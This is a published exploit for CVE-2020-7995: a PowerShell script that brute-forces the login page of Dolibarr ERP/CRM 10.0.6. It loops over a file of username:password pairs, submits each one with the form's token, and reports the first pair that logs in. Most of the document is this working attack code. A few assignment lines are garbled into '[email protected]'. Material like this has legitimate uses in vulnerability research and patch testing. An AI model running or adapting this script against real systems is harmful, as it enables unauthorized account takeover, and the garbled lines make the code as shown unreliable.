Authored by Creamy Chicken Soup

Dolibarr ERP/CRM version 10.0.6 login brute forcing exploit.

advisories | CVE-2020-7995

# Exploit Title: Dolibarr ERP/CRM 10.0.6 - Login Brute Force
# Date:2020-01-18
# Exploit Author: Creamy Chicken Soup
# Vendor Homepage: https://www.dolibarr.org
# Software Link: https://sourceforge.net/projects/dolibarr/
# Version: 10.0.6
# Tested on: Windows 10 - 64bit
# CVE: CVE-2020-7995

function brute($url,$username,$passwd){
try{
$WebResponse = Invoke-WebRequest $url
$a=$WebResponse.Forms.fields
[email protected]{"token"=$a.token ;"loginfunction"=$a.loginfunction;"username"=$username;"password"=$passwd}
$WebResponse1 = Invoke-WebRequest -Uri $url -Method Post -Body $fields
if($WebResponse1.Forms.Id -ne "login"){
Write-Host "username password is match"
Write-Warning "user: $username ,passwoed: $passwd"
return $true
}
}catch{
Write-Warning "Something Wrong!"
}
}

function fileinput($filepath,$url){
try{
Write-Host "Target: $url"
$fp=Get-Content -Path $filepath
foreach($line in $fp){
$s=$line -split ':'
$username=$s[0]
$passwd=$s[1]
Write-Host "[+] Check $username : $passwd"
$bf=brute $url $username $passwd
if($bf -eq $True){
break
}
}
}catch{
Write-Warning "File is error"
}
}

[email protected]'
____ ____ _____ ____ _ ___ _ ____ _ _ ____ _ __ _____ _ ____ ____ _ ____
/ _/ __/ __// _ / __/| /// _/ /|/ / _/ |/ // __// /|/ ___/ _ / // __
| / | /|| | / || |/|| / | / | |_||| || / | / | | | ||| | / || | ||| /|
| __| /| /_ | |-||| | || / / | __| | ||| || _ | | /_ | | ||___ || _/|| _/|| __/
____/_/______/ |_/ |/_/ ____/_/ |_/____/_|______/ |____/____/____/_/

'@

Write-Host $textart
Write-Host @'
Exploit Title: DOLIBARR ERP/CRM - Brute Force Vulnerability
Date: 2020-01-18
Exploit Author: CreamyChickenSoup
Vendor Homepage: https://www.dolibarr.org
Version: 10.0.6
CVE: CVE-2020-7995
Vulnerable Page : http://localhost/htdocs/index.php?mainmenu=home
Twitter: @creamychickens1
cve submited:Tufan Gungor
'@
$url=Read-Host "Enter Url:"
$filepath=Read-Host "Enter FilePAth: (File content like : user:pass)"
fileinput $filepath $url